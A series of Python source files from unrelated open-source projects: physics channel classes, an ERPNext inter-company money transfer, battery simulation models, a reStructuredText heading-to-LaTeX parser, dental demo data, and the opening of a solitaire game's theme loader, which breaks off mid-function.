sigmond_query=sigmond_query) else: return AtRestChannel(particle_type=operator.particle_type, isospin=operator.isospin, strangeness=operator.strangeness, lg_irrep=operator.lg_irrep, laph_query=laph_query, sigmond_query=sigmond_query) else: query_result = subprocess.check_output([sigmond_query, '-k', data_file]).decode() try: records = query_result.split('Record') observable = MCObservable.createFromXML(util.queryToXML(records[1])) if observable.psq > 0: return MovingChannel(isospin=observable.isospin, psq=observable.psq, lg_irrep=observable.lg_irrep, laph_query=laph_query, sigmond_query=sigmond_query) else: return AtRestChannel(isospin=observable.isospin, lg_irrep=observable.lg_irrep, laph_query=laph_query, sigmond_query=sigmond_query) except IndexError: logging.warning("%s contains no records", data_file) except AttributeError: logging.warning("%s contains Observables", data_file) return None def addRawDataChannel(self, path, is_basic_laph=True): if is_basic_laph: self.raw_data_channels.append(BLDataChannel(path, self.laph_query)) else: self.raw_data_channels.append(GIDataChannel(path, self.sigmond_query)) @property @abc.abstractmethod def channel_string(self): pass @property def is_special(self): return isinstance(self, SpecialChannel) @property def is_atrest(self): return isinstance(self, AtRestChannel) @property def is_moving(self): return isinstance(self, MovingChannel) def __hash__(self): return hash(self.__repr__()) def __str__(self): return self.channel_string # @ADH - Should be checking that 'other' is an instance of an object # derived from Channel. I'm not sure how to best do that right now. # So, this will suffice for the moment. def __eq__(self, other): return self.__repr__() == other.__repr__() def __ne__(self, other): return self.__repr__() != other.__repr__() def __lt__(self, other): return self.__repr__() < other.__repr__() def __gt__(self, other): return self.__repr__() > other.__repr__() def __le__(self, other): return self.__repr__() <= other.__repr__() def __ge__(self, other): return self.__repr__() >= other.__repr__() class SpecialChannel(Channel): def __init__(self, *, particle_type, isospin, strangeness, flavor, laph_query="laph_query", sigmond_query="sigmond_query"): super().__init__(particle_type=particle_type, isospin=isospin, strangeness=strangeness, laph_query=laph_query, sigmond_query=sigmond_query) self.flavor = flavor @property def channel_string(self): if self.particle_type == "boson": particle_type = "B" elif self.particle_type == "fermion": particle_type = "F" strangeness = str(self.strangeness).replace('-', 'm') return "{p_type}_{flavor}_I{isospin}_S{strangeness}_special".format( p_type=particle_type, flavor=self.flavor, isospin=self.ISOSPIN_MAP[self.isospin], strangeness=strangeness) def __repr__(self): return "SP_{}".format(self.channel_string) class AtRestChannel(Channel): def __init__(self, *, particle_type=None, isospin, strangeness=None, lg_irrep, laph_query="laph_query", sigmond_query="sigmond_query"): super().__init__(particle_type=particle_type, isospin=isospin, strangeness=strangeness, laph_query=laph_query, sigmond_query=sigmond_query) self.psq = 0 self.lg_irrep = lg_irrep @property def channel_string(self): if self.particle_type == "boson": particle_type = "B_" elif self.particle_type == "fermion": particle_type = "F_" else: particle_type = "" if self.strangeness is not None: strangeness = "S{}_".format(self.strangeness).replace('-', 'm') else: strangeness = "" return "{p_type}I{isospin}_{strangeness}P0_{irrep}".format( p_type=particle_type, isospin=self.ISOSPIN_MAP[self.isospin], strangeness=strangeness, irrep=self.lg_irrep) def __repr__(self): return "AR_{}".format(self.channel_string) class MovingChannel(Channel): def __init__(self, *, particle_type=None, isospin, strangeness=None, psq, lg_irrep, laph_query="laph_query", sigmond_query="sigmond_query"): super().__init__(particle_type=particle_type, isospin=isospin, strangeness=strangeness, laph_query=laph_query, sigmond_query=sigmond_query) self.psq = psq self.lg_irrep = lg_irrep @property def channel_string(self): if self.particle_type == "boson": particle_type = "B_" elif self.particle_type == "fermion": particle_type = "F_" else: particle_type = "" if self.strangeness is not None: strangeness = "S{}_".format(self.strangeness).replace('-', 'm') else: strangeness = "" return "{p_type}I{isospin}_{strangeness}PSQ{psq}_{irrep}".format( p_type=particle_type, isospin=self.ISOSPIN_MAP[self.isospin], strangeness=strangeness, psq=self.psq, irrep=self.lg_irrep) def __repr__(self): return "MV_{}".format(self.channel_string)
ahmadRagheb/goldenHR
erpnext/accounts/doctype/money_transfere/money_transfere.py
# -*- coding: utf-8 -*- # Copyright (c) 2017, Frappe Technologies Pvt. Ltd. and contributors # For license information, please see license.txt from __future__ import unicode_literals import frappe from frappe.model.document import Document from frappe.utils.data import flt, nowdate, getdate, cint class MoneyTransfere(Document): def on_submit(self): self.validate_transfere() def validate(self): self.get_dummy_accounts() def get_dummy_accounts(self): dummy_to = frappe.db.get_values("Account", {"name": "حساب استلام من"+" - "+self.from_company + " - "+self.abbr_to, "company": self.to_company, "parent_account":"حساب استلام من"+" - "+self.abbr_to }) self.dummy_to=dummy_to[0][0] dummy_from = frappe.db.get_values("Account", {"name": "حساب ارسال الي"+" - "+self.to_company + " - "+self.abbr, "company": self.from_company, "parent_account":"حساب ارسال"+" - "+self.abbr }) self.dummy_from=dummy_from[0][0] def before_cancel(self): pe = frappe.get_value("Payment Entry", filters = {"transfere_reference": self.name}, fieldname = "name") if pe: pe_doc = frappe.get_doc("Payment Entry", pe) pe_doc.cancel() je = frappe.get_value("Journal Entry Account", filters = {"reference_name": self.name}, fieldname = "parent") if je: je_doc = frappe.get_doc("Journal Entry", je) je_doc.cancel() def validate_transfere(self): if self.from_company != self.to_company: # sending_account = "حساب ارسال الى " + self.to_company # receiving_account = "حساب استلام من " + self.from_company # self.add_account_for_company(sending_account, self.to_company, "Liability") # self.add_account_for_company(receiving_account, self.from_company, "Expense") self.add_payment_entry(self.from_account, self.dummy_from, self.from_company) self.add_journal_entry(self.to_account,self.dummy_to, self.to_company) else: self.add_payment_entry(self.from_account, self.to_account, self.from_company) def add_account_for_company(self, account, company, r_type): pass # pacc_name = "" # if r_type == "Expense": # pacc_name = "حساب ارسال - E" # elif r_type == "Liability": # pacc_name = "حساب استقبال - o" # # if not frappe.db.exists("Account", pacc_name): # # pacc = frappe.new_doc("Account") # # pacc.account_name = pacc_name # # pacc.root_type = r_type # # pacc.is_group = 1 # # pacc.parent_account = "" # # pacc.company = company # # pacc.flags.ignore_validate = True # # pacc.insert() # if not frappe.db.exists("Account", account): # acc = frappe.new_doc("Account") # acc.account_name = account # acc.company = company # acc.parent_account = pacc_name # acc.is_group = 0 # acc.insert() def add_payment_entry(self, paid_from, paid_to, company): pe = frappe.new_doc("Payment Entry") pe.payment_type = "Internal Transfer" pe.company = company pe.paid_from = paid_from pe.paid_to = paid_to pe.paid_amount = self.transfered_amount pe.received_amount = self.transfered_amount pe.posting_date = nowdate() pe.mode_of_payment = self.mode_of_payment pe.transfere_reference = self.name pe.insert() pe.submit() # pe.setup_party_account_field() # pe.set_missing_values() # pe.set_exchange_rate() # pe.set_amounts() # self.assertEquals(pe.difference_amount, 500) # pe.append("deductions", { # "account": "_Test Exchange Gain/Loss - _TC", # "cost_center": "_Test Cost Center - _TC", # "amount": 500 # }) def add_journal_entry(self, account1, account2, company): default_cost = frappe.get_value("Company", filters = {"name":company}, fieldname = "cost_center") jv = frappe.new_doc("Journal Entry") jv.posting_date = nowdate() jv.company = company jv.voucher_type = "Opening Entry" jv.set("accounts", [ { "account": account2, "credit_in_account_currency": self.transfered_amount, "cost_center": default_cost, "reference_type": "Money Transfere", "reference_name": self.name }, { "account": account1, "debit_in_account_currency": self.transfered_amount, "cost_center": default_cost, "reference_type": "Money Transfere", "reference_name": self.name } ]) jv.insert() jv.submit()
tsaoyu/D3HRE
D3HRE/core/battery_models.py
import numpy as np def min_max_model(power, use, battery_capacity): """ Minimal maximum battery model, obsoleted :param power: Pandas TimeSeries, total power from renewable system :param use: float, unit W fixed load of the power system :param battery_capacity: float, unit Wh battery capacity :return: list, energy history in battery """ power = power.tolist() energy = 0 energy_history = [] for p in power: energy = min(battery_capacity, max(0, energy + (p - use) * 1)) energy_history.append(energy) return energy_history def soc_model_fixed_load( power, use, battery_capacity, depth_of_discharge=1, discharge_rate=0.005, battery_eff=0.9, discharge_eff=0.8, ): """ Battery state of charge model with fixed load. (Obsolete) :param power: Pandas TimeSeries of total power from renewable system :param use: float unit W fixed load of the power system :param battery_capacity: float unit Wh battery capacity :param depth_of_discharge: float 0 to 1 maximum allowed discharge depth :param discharge_rate: self discharge rate :param battery_eff: optional 0 to 1 battery energy store efficiency default 0.9 :param discharge_eff: battery discharge efficiency 0 to 1 default 0.8 :return: tuple SOC: state of charge, energy history: E in battery, unmet_history: unmet energy history, waste_history: waste energy history """ DOD = depth_of_discharge power = power.tolist() use_history = [] waste_history = [] unmet_history = [] energy_history = [] energy = 0 for p in power: if p >= use: use_history.append(use) unmet_history.append(0) energy_new = energy * (1 - discharge_rate) + (p - use) * battery_eff if energy_new < battery_capacity: energy = energy_new # battery energy got update waste_history.append(0) else: waste_history.append(p - use) energy = energy elif p < use: energy_new = energy * (1 - discharge_rate) + (p - use) / discharge_eff if energy_new > (1 - DOD) * battery_capacity: energy = energy_new unmet_history.append(0) waste_history.append(0) use_history.append(use) elif energy * (1 - discharge_rate) + p * battery_eff < battery_capacity: energy = energy * (1 - discharge_rate) + p * battery_eff unmet_history.append(use - p) use_history.append(0) waste_history.append(0) else: unmet_history.append(use - p) use_history.append(0) waste_history.append(p) energy = energy energy_history.append(energy) if battery_capacity == 0: SOC = np.array(energy_history) else: SOC = np.array(energy_history) / battery_capacity return SOC, energy_history, unmet_history, waste_history, use_history class Battery: """ A simple finite state based energy flow battery model. """ def __init__(self, capacity, config={}): """ Initialise the battery with a given capacity and configuration. :param capacity: float, unit Wh :param config: options including DOD, depth of discharge; sigma, self-discharge rate; eta_in, charge efficiency; eta_out, discharge efficiency; init_charge, percentage of the battery pre-charge; where all values shall between 0 and 1 """ self.capacity = capacity self.config = config self.set_parameters() def set_parameters(self): """ Setup the parameters using the config file, options including DOD, depth of discharge; sigma, self-discharge rate; eta_in, charge efficiency; eta_out, discharge efficiency; init_charge, percentage of the battery pre-charge; where all values shall between 0 and 1. """ try: self.depth_of_discharge = self.config['simulation']['battery']['DOD'] self.discharge_rate = self.config['simulation']['battery']['sigma'] self.battery_eff = self.config['simulation']['battery']['eta_in'] self.discharge_eff = self.config['simulation']['battery']['eta_out'] self.init_charge = self.config['simulation']['battery']['B0'] except KeyError: print('Parameter is not found in config file, default values are used.') self.depth_of_discharge = 1 self.discharge_rate = 0.005 self.battery_eff = 0.9 self.discharge_eff = 0.8 self.init_charge = 1 def run(self, power, use): """ Run the battery model with a list of power generation and usage. :param power: list, power generation unit in W :param use: list, power usage unit in W :return: None """ DOD = self.depth_of_discharge battery_capacity = self.capacity discharge_rate = self.discharge_rate discharge_eff = self.discharge_eff battery_eff = self.battery_eff use_history = [] waste_history = [] unmet_history = [] energy_history = [] SOC = [] energy = self.init_charge * self.capacity for p, u in zip(power, use): if p >= u: use_history.append(u) unmet_history.append(0) energy_new = energy * (1 - discharge_rate) + (p - u) * battery_eff if energy_new < battery_capacity: energy = energy_new # battery energy got update waste_history.append(0) else: waste_history.append(p - u) energy = energy elif p < u: energy_new = energy * (1 - discharge_rate) + (p - u) / discharge_eff if energy_new > (1 - DOD) * battery_capacity: energy = energy_new unmet_history.append(0) waste_history.append(0) use_history.append(u) elif energy * (1 - discharge_rate) + p * battery_eff < battery_capacity: energy = energy * (1 - discharge_rate) + p * battery_eff unmet_history.append(u - p) use_history.append(0) waste_history.append(0) else: unmet_history.append(u - p) use_history.append(0) waste_history.append(p) energy = energy energy_history.append(energy) SOC.append(energy / battery_capacity) self.SOC = SOC self.energy_history = energy_history self.unmet_history = unmet_history self.waste_history = waste_history self.use_history = use_history def battery_history(self): """ Return the history of the battery. :return: np array, the SOC, energy in the battery, unmet power supply, wasted power and the supplied power unit in W """ history = np.vstack( ( np.array(self.SOC), np.array(self.energy_history), np.array(self.unmet_history), np.array(self.waste_history), np.array(self.use_history), ) ) return history def lost_power_supply_probability(self): """ Return the lost power supply probability (LPSP) using the battery history. :return: float, LPSP """ LPSP = 1 - self.unmet_history.count(0) / len(self.energy_history) return LPSP class Battery_managed: """ Battery managed is a the basic class for the demand load controllable battery model. """ def __init__(self, capacity, config={}): """ :param capacity: float, unit Wh :param config: options including DOD, depth of discharge; sigma, self-discharge rate; eta_in, charge efficiency; eta_out, discharge efficiency; init_charge, percentage of the battery pre-charge; where all values shall between 0 and 1 """ self.capacity = capacity self.config = config self.set_parameters() self.init_history() self.init_simulation() self.status = [] self.states_list = [] def set_parameters(self): """ Setup the parameters using the config file, options including DOD, depth of discharge; sigma, self-discharge rate; eta_in, charge efficiency; eta_out, discharge efficiency; init_charge, percentage of the battery pre-charge; where all values shall between 0 and 1. """ try: self.depth_of_discharge = self.config['simulation']['battery']['DOD'] self.discharge_rate = self.config['simulation']['battery']['sigma'] self.battery_eff = self.config['simulation']['battery']['eta_in'] self.discharge_eff = self.config['simulation']['battery']['eta_out'] self.init_charge = self.config['simulation']['battery']['B0'] self.DOD = self.depth_of_discharge except KeyError: print('Parameter is not found in config file, default values are used.') self.depth_of_discharge = 1 self.discharge_rate = 0.005 self.battery_eff = 0.9 self.discharge_eff = 0.8 self.init_charge = 1 self.DOD = self.depth_of_discharge def reset(self): """ Reset the battery state to the start of simulation. :return: """ self.init_history() self.init_simulation() def init_simulation(self): self.energy = self.init_charge * self.capacity def init_history(self): self.supply_history = [] self.waste_history = [] self.unmet_history = [] self.battery_energy_history = [] self.SOC = [] def step(self, plan, generated, gym = False): """ Run the finite state battery model on one time step. :param plan: float, planned power usage in W :param generated: float, power generation unit in W :param gym: optional, set True to using in OpenAI gym mode :return: float, the supplied power in W """ if gym == True: plan = plan[0][0] if generated >= plan: self.supply_history.append(plan) self.unmet_history.append(0) energy_new = self.energy * (1 - self.discharge_rate) + (generated - plan) * self.battery_eff if energy_new < self.capacity: self.energy = energy_new # battery energy got update self.waste_history.append(0) self.status.append("""Demand can be meet by generation, also battery is not full. Supply {demand}, charge {diff}.""".format(demand=plan, diff=generated - plan) ) self.state = 'charge' else: self.waste_history.append(generated - plan - (self.capacity - self.energy)) self.energy = self.capacity self.status.append("""Demand can be meet by generation, but battery is already full. Supply {demand}, charge battery to full waste {diff}.""".format( demand=plan, diff=generated - plan) ) self.state = 'float' elif generated < plan: energy_new = self.energy * (1 - self.discharge_rate) + (generated - plan) / self.discharge_eff if energy_new > (1 - self.DOD) * self.capacity: self.energy = energy_new self.unmet_history.append(0) self.waste_history.append(0) self.supply_history.append(plan) self.status.append("""Demand can not meet by generation, power in battery can make up difference. Supply {demand} by discharge from battery""".format(demand=plan)) self.state = 'discharge' elif self.energy * (1 - self.discharge_rate) + generated * self.battery_eff < self.capacity: self.energy = self.energy * (1 - self.discharge_rate) + generated * self.battery_eff self.unmet_history.append(plan - generated) self.supply_history.append(0) self.waste_history.append(0) self.status.append("""Demand can not meet by generation, also power in battery can not make up difference. Charge {diff} to battery to avoid waste""".format(diff=generated)) self.state = 'unmet' else: self.unmet_history.append(plan - generated) self.supply_history.append(0) self.waste_history.append(generated - (self.capacity - self.energy)) self.energy = self.capacity self.status.append("""Demand can not meet by generation, also power in battery can not make up difference. Charge {diff} to make battery full""".format( diff=self.capacity-self.energy)) self.state = 'unmet' self.states_list.append(self.state) self.battery_energy_history.append(self.energy) self.SOC.append(self.energy / self.capacity) self.supply = self.supply_history[-1] return self.supply def history(self): """ Get the history of the managed battery. :return: np array including the history of the battery: SOC, battery energy, unmet and wasted energy, supplied power """ battery_history = np.vstack( ( np.array(self.SOC), np.array(self.battery_energy_history), np.array(self.unmet_history), np.array(self.waste_history), np.array(self.supply_history), ) ) return battery_history def observation(self): """ Observation :return: """ battery_state = { 'current_energy': self.energy, 'usable_capacity': self.DOD * self.capacity, } return battery_state def story_board(self): """ For the use of explainable AI in power management system. :return: the status of battery """ return self.status def lost_power_supply_probability(self): """ Get the lost power supply probability of the managed battery after run. :return: float, LPSP """ LPSP = 1 - self.unmet_history.count(0) / len(self.SOC) return LPSP def copy(self): """ Make a copy of battery model. :return: Copied version of battery with same capacity and configuration """ return Battery_managed(self.capacity, self.config) class Soc_model_variable_load: """ Obsolete basic class. """ def __init__(self, battery, power, load): self.battery = battery self.battery.run(power, load) def get_lost_power_supply_probability(self): return self.battery.lost_power_supply_probability() def get_battery_history(self): return self.battery.battery_history() def get_quality_performance_index(self): pass def soc_model_variable_load( power, use, battery_capacity, depth_of_discharge=1, discharge_rate=0.005, battery_eff=0.9, discharge_eff=0.8, ): """ Battery state of charge model with fixed load. :param power: Pandas TimeSeries of total power from renewable system :param use: float unit W fixed load of the power system :param battery_capacity: float unit Wh battery capacity :param depth_of_discharge: float 0 to 1 maximum allowed discharge depth :param discharge_rate: self discharge rate :param battery_eff: optional 0 to 1 battery energy store efficiency default 0.9 :param discharge_eff: battery discharge efficiency 0 to 1 default 0.8 :return: tuple SOC: state of charge, energy history: E in battery, unmet_history: unmet energy history, waste_history: waste energy history """ DOD = depth_of_discharge power = power.tolist() use = use.tolist() use_history = [] waste_history = [] unmet_history = [] energy_history = [] energy = 0 for p, u in zip(power, use): if p >= u: use_history.append(u) unmet_history.append(0) energy_new = energy * (1 - discharge_rate) + (p - u) * battery_eff if energy_new < battery_capacity: energy = energy_new # battery energy got update waste_history.append(0) else: waste_history.append(p - u) energy = energy elif p < u: energy_new = energy * (1 - discharge_rate) + (p - u) / discharge_eff if energy_new > (1 - DOD) * battery_capacity: energy = energy_new unmet_history.append(0) waste_history.append(0) use_history.append(use) elif energy * (1 - discharge_rate) + p * battery_eff < battery_capacity: energy = energy * (1 - discharge_rate) + p * battery_eff unmet_history.append(u - p) use_history.append(0) waste_history.append(0) else: unmet_history.append(u - p) use_history.append(0) waste_history.append(p) energy = energy energy_history.append(energy) if battery_capacity == 0: SOC = np.array(energy_history) else: SOC = np.array(energy_history) / battery_capacity return SOC, energy_history, unmet_history, waste_history, use_history if __name__ == '__main__': b1 = Battery(10) b1.run([1, 1, 1], [1, 1, 1]) b1.run([1, 1, 1], [10, 10, 10]) print(b1.lost_power_supply_probability())
ZelphirKaltstahl/rst-internal-links-to-raw-latex
RSTInternalLinks/HeadingsParser.py
import re class HeadingsParser(): """ The HeadingParser parses the document for headings. NOT YET: converts headings to raw latex headings in the correct way, so that they can be referrenced to later see https://www.sharelatex.com/learn/Sections_and_chapters for info about the levels""" def __init__(self): super().__init__() self.title = None self.subtitle = None self.heading = [] # regexes self.title_start_marker_regex = re.compile(r'[=]{3,}') self.title_end_marker_regex = re.compile(r'[=]{3,}') self.title_content_regex = re.compile( r''' ^ # beginning of line [ ] # one whitespace [A-Za-z0-9äöüÄÖÜ]+ # alphanumerical string, no whitespace (?P<title>[A-Za-z0-9äöüÄÖÜ ]+) # alphanumerical string, whitespace ok [A-Za-z0-9äöüÄÖÜ]+ # alphanumerical string, no whitespace [ ] # one whitespace $ # end of line ''', re.VERBOSE|re.UNICODE ) self.subtitle_start_marker_regex = re.compile(r'[-]{3,}') self.subtitle_end_marker_regex = re.compile(r'[-]{3,}') self.subtitle_content_regex = re.compile( r''' ^ # beginning of line [ ] # one whitespace [A-Za-z0-9äöüÄÖÜ]+ # alphanumerical string, no whitespace (?P<subtitle>[A-Za-z0-9äöüÄÖÜ ]+) # alphanumerical string, whitespace ok [A-Za-z0-9äöüÄÖÜ]+ # alphanumerical string, no whitespace [ ] # one whitespace $ # end of line ''', re.VERBOSE|re.UNICODE ) # Headings cannot begin with whitespace self.h_content_regex = re.compile( r''' ^ # beginning of line [A-Za-z0-9äöüÄÖÜß(] # alphanum [A-Za-z0-9äöüÄÖÜß,() -]* # alphanum or space [A-Za-z0-9äöüÄÖÜß)] # alphanum $ # end of line ''', re.VERBOSE|re.UNICODE ) # chapter self.h1_underlining_regex = re.compile(r'[=]{3,}') # section self.h2_underlining_regex = re.compile(r'[-]{3,}') # subsection self.h3_underlining_regex = re.compile(r'[~]{3,}') # subsubsection self.h4_underlining_regex = re.compile(r'[\^]{3,}') # paragraph self.h5_underlining_regex = re.compile(r'[*]{3,}') # subparagraph self.h6_underlining_regex = re.compile(r'[.]{3,}') def parse(self, rst_file_content): self.title = self.find_title(rst_file_content) self.subtitle_content_regex = self.find_subtitle(rst_file_content) return self.find_heading_labels(rst_file_content) def find_title(self, rst_file_content): print('looking for title ...') title = None for lineno, line in enumerate(rst_file_content): previous_line = "" if lineno > 0: previous_line = rst_file_content[lineno - 1] next_line = "" if lineno < len(rst_file_content) - 1: next_line = rst_file_content[lineno + 1] # title if ( self.title_start_marker_regex.match(previous_line) and self.title_end_marker_regex.match(next_line) and ( len(self.title_start_marker_regex.match(previous_line).group()) == len(self.title_end_marker_regex.match(next_line).group()) ) and self.title_content_regex.match(line) and not title ): title = self.title_content_regex.match(line).group('title') print('title is:|', title, '|', sep='') break if not title: print('Could not find title in document.') return title def find_subtitle(self, rst_file_content): print('looking for subtitle ...') subtitle = None for lineno, line in enumerate(rst_file_content): previous_line = "" if lineno > 0: previous_line = rst_file_content[lineno - 1] next_line = "" if lineno < len(rst_file_content) - 1: next_line = rst_file_content[lineno + 1] if ( self.subtitle_start_marker_regex.match(previous_line) and self.subtitle_end_marker_regex.match(next_line) and ( len(self.subtitle_start_marker_regex.match(previous_line).group()) == len(self.subtitle_end_marker_regex.match(next_line).group()) ) and self.subtitle_content_regex.match(line) and not subtitle ): subtitle = self.subtitle_content_regex.match(line).group('subtitle') print('subtitle is:|', subtitle, '|', sep='') break if not subtitle: print('Could not find subtitle in document.') return subtitle def find_heading_labels(self, rst_file_content): print('looking for headings ...') headings_dict = {} # heading_labels = [] for lineno, line in enumerate(rst_file_content): # print('current line:', lineno) # print('current line:', line) # if line.startswith("Schlussfolgerungen"): # print('current line:', line) previous_line = "" if lineno > 0: previous_line = rst_file_content[lineno - 1] next_line = "" if lineno < len(rst_file_content) - 1: next_line = rst_file_content[lineno + 1] # headings level 1 # print('looking for h1 ...') if ( (previous_line.isspace() or previous_line == '') and self.h_content_regex.match(line) and self.h1_underlining_regex.match(next_line) and len(self.h_content_regex.match(line).group()) == len(self.h1_underlining_regex.match(next_line).group()) ): print('found a h1:', line) print('replacing chapter heading') headings_dict[line] = self.heading_to_label(line, 'chapter') # heading_labels.append(self.heading_to_label(line, 'chapter')) rst_file_content[lineno] = ':raw-latex:`\chapter{' + line + '}`' rst_file_content[lineno + 1] = ':raw-latex:`\label{' + self.heading_to_label(line, 'chapter') + '}`' # headings level 2 # print('looking for h2 ...') if ( (previous_line.isspace() or previous_line == '') and self.h_content_regex.match(line) and self.h2_underlining_regex.match(next_line) and len(self.h_content_regex.match(line).group()) == len(self.h2_underlining_regex.match(next_line).group()) ): print('found a h2:', line) headings_dict[line] = self.heading_to_label(line, 'section') # heading_labels.append(self.heading_to_label(line, 'section')) rst_file_content[lineno] = ':raw-latex:`\section{' + line + '}`' rst_file_content[lineno + 1] = ':raw-latex:`\label{' + self.heading_to_label(line, 'section') + '}`' # headings level 3 # print('looking for h3 ...') if ( (previous_line.isspace() or previous_line == '') and self.h_content_regex.match(line) and self.h3_underlining_regex.match(next_line) and len(self.h_content_regex.match(line).group()) == len(self.h3_underlining_regex.match(next_line).group()) ): print('found a h3:', line) # heading_labels.append(self.heading_to_label(line, 'subsection')) headings_dict[line] = self.heading_to_label(line, 'subsection') rst_file_content[lineno] = ':raw-latex:`\subsection{' + line + '}`' rst_file_content[lineno + 1] = ':raw-latex:`\label{' + self.heading_to_label(line, 'subsection') + '}`' # headings level 4 # print('looking for h4 ...') if ( (previous_line.isspace() or previous_line == '') and self.h_content_regex.match(line) and self.h4_underlining_regex.match(next_line) and len(self.h_content_regex.match(line).group()) == len(self.h4_underlining_regex.match(next_line).group()) ): print('found a h4:', line) # heading_labels.append(self.heading_to_label(line, 'subsubsection')) headings_dict[line] = self.heading_to_label(line, 'subsubsection') rst_file_content[lineno] = ':raw-latex:`\subsubsection{' + line + '}`' rst_file_content[lineno + 1] = ':raw-latex:`\label{' + self.heading_to_label(line, 'subsubsection') + '}`' # headings level 5 # print('looking for h5 ...') if ( (previous_line.isspace() or previous_line == '') and self.h_content_regex.match(line) and self.h5_underlining_regex.match(next_line) and len(self.h_content_regex.match(line).group()) == len(self.h5_underlining_regex.match(next_line).group()) ): print('found a h5:', line) # heading_labels.append(self.heading_to_label(line, 'paragraph')) headings_dict[line] = self.heading_to_label(line, 'paragraph') rst_file_content[lineno] = ':raw-latex:`\paragraph{' + line + '}`' rst_file_content[lineno + 1] = ':raw-latex:`\label{' + self.heading_to_label(line, 'paragraph') + '}`' # headings level 6 # print('looking for h6 ...') if ( (previous_line.isspace() or previous_line == '') and self.h_content_regex.match(line) and self.h6_underlining_regex.match(next_line) and len(self.h_content_regex.match(line).group()) == len(self.h6_underlining_regex.match(next_line).group()) ): print('found a h6:', line) # heading_labels.append(self.heading_to_label(line, 'subparagraph')) headings_dict[line] = self.heading_to_label(line, 'subparagraph') rst_file_content[lineno] = ':raw-latex:`\subparagraph{' + line + '}`' rst_file_content[lineno + 1] = ':raw-latex:`\label{' + self.heading_to_label(line, 'subparagraph') + '}`' return headings_dict def heading_to_label(self, heading_text, level): heading_text = heading_text.lower() replaced_chars = { ' ': '-', '(': '', ')': '' } for key,value in replaced_chars.items(): heading_text = heading_text.replace(key, value) return '{0}:{1}'.format(level, heading_text) # self.chapter_delimiter_regex = re.compile(r'={3,}') # ============= # self.section_delimiter_regex = re.compile(r'-{3,}') # ------------- # self.subsection_delimiter_regex = re.compile(r'~{3,}') # ~~~~~~~~~~~~~ # self.subsubsection_delimiter_regex = re.compile(r'\^{3,}') # ^^^^^^^^^^^^^ # self.heading_text_regex = re.compile( # r''' # ^ # \s* # (?P<title_text> # [a-zA-Z0-9] # [a-zA-Z0-9_ -]* # [a-zA-Z0-9] # ) # \s* # $''', # re.VERBOSE) # self.heading_keys = [] # def parse_headings(self, rst_file_content): # for lineno, line in enumerate(rst_file_content): # # # search for title # if self.title_delimiter_regex.search(line) is not None: # if (lineno >= 2): # if ( # self.title_delimiter_regex.search(rst_file_content[lineno - 2]) is not None and # self.heading_text_regex.search(rst_file_content[lineno - 1]) is not None # ): # title_text = self.heading_text_regex.findall(rst_file_content[lineno - 1])[0].strip() # self.heading_keys.append(re.sub('\s+', '-', title_text.lower())) # print('[DEBUG:HEADINGS]', self.heading_keys) # print('[DEBUG:HEADINGS] !!! found a title in the document:', title_text, sep='') # # # TODO: elif subtitle
rowinggolfer/openmolar2
src/lib_openmolar/admin/db_orm/admin_practitioners.py
#! /usr/bin/env python # -*- coding: utf-8 -*- ############################################################################### ## ## ## Copyright 2010-2012, Neil Wallace <neil@openmolar.com> ## ## ## ## This program is free software: you can redistribute it and/or modify ## ## it under the terms of the GNU General Public License as published by ## ## the Free Software Foundation, either version 3 of the License, or ## ## (at your option) any later version. ## ## ## ## This program is distributed in the hope that it will be useful, ## ## but WITHOUT ANY WARRANTY; without even the implied warranty of ## ## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ## ## GNU General Public License for more details. ## ## ## ## You should have received a copy of the GNU General Public License ## ## along with this program. If not, see <http://www.gnu.org/licenses/>. ## ## ## ############################################################################### ''' Provides schema and insert queries for the practitioner table information about the practitioners (dentists hygienists etc..) ''' from lib_openmolar.common.db_orm import InsertableRecord TABLENAME = "practitioners" class DemoGenerator(object): def __init__(self, database=None): self.length = 4 self.record = InsertableRecord(database, TABLENAME) self.record.remove(self.record.indexOf("time_stamp")) def demo_queries(self): ''' return a list of queries to populate a demo database ''' ## practitioner 1 self.record.setValue('user_id', 1) self.record.setValue('type',"dentist") self.record.setValue('status', "active") self.record.setValue('modified_by', "demo_installer") yield self.record.insert_query self.record.clearValues() ## practitioner 2 self.record.setValue('user_id', 2) self.record.setValue('type',"dentist") self.record.setValue('status', "active") self.record.setValue('modified_by', "demo_installer") yield self.record.insert_query self.record.clearValues() ## practitioner 3 self.record.setValue('user_id', 3) self.record.setValue('type',"dentist") self.record.setValue('speciality', 'Orthodontics') self.record.setValue('status', "active") self.record.setValue('modified_by', "demo_installer") yield self.record.insert_query self.record.clearValues() ## practitioner 4 self.record.setValue('user_id', 4) self.record.setValue('type',"hygienist") self.record.setValue('status', "active") self.record.setValue('modified_by', "demo_installer") yield self.record.insert_query if __name__ == "__main__": from lib_openmolar.admin.connect import DemoAdminConnection sc = DemoAdminConnection() sc.connect() builder = DemoGenerator(sc) print builder.demo_queries()
jimsize/PySolFC
pysollib/winsystems/common.py
#!/usr/bin/env python # -*- mode: python; coding: utf-8; -*- # --------------------------------------------------------------------------- # # Copyright (C) 1998-2003 Markus Franz Xaver Johannes Oberhumer # Copyright (C) 2003 Mt. Hood Playing Card Co. # Copyright (C) 2005-2009 Skomoroh # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # # --------------------------------------------------------------------------- import os import traceback from pysollib.mygettext import _ from pysollib.settings import TITLE from pysollib.settings import VERSION from pysollib.settings import TOOLKIT, USE_TILE from pysollib.settings import DEBUG from pysollib.mfxutil import print_err if TOOLKIT == 'tk': if USE_TILE: from pysollib.tile import ttk def init_tile(app, top): # load available themes d = os.path.join(app.dataloader.dir, 'themes') if os.path.isdir(d): top.tk.eval('global auto_path; lappend auto_path {%s}' % d) for t in os.listdir(d): if os.path.exists(os.path.join(d, t, 'pkgIndex.tcl')): try: top.tk.eval('package require ttk::theme::'+t) # print 'load theme:', t except Exception: traceback.print_exc() pass def set_theme(app, top, theme): # set theme style = ttk.Style(top) try: style.theme_use(theme) except Exception: print_err(_('invalid theme name: ') + theme) style.theme_use(app.opt.default_tile_theme) def get_font_name(font): # create font name # i.e. "helvetica 12" -> ("helvetica", 12, "roman", "normal") if (TOOLKIT == 'kivy'): return "helvetica 12" from six.moves.tkinter_font import Font font_name = None try: f = 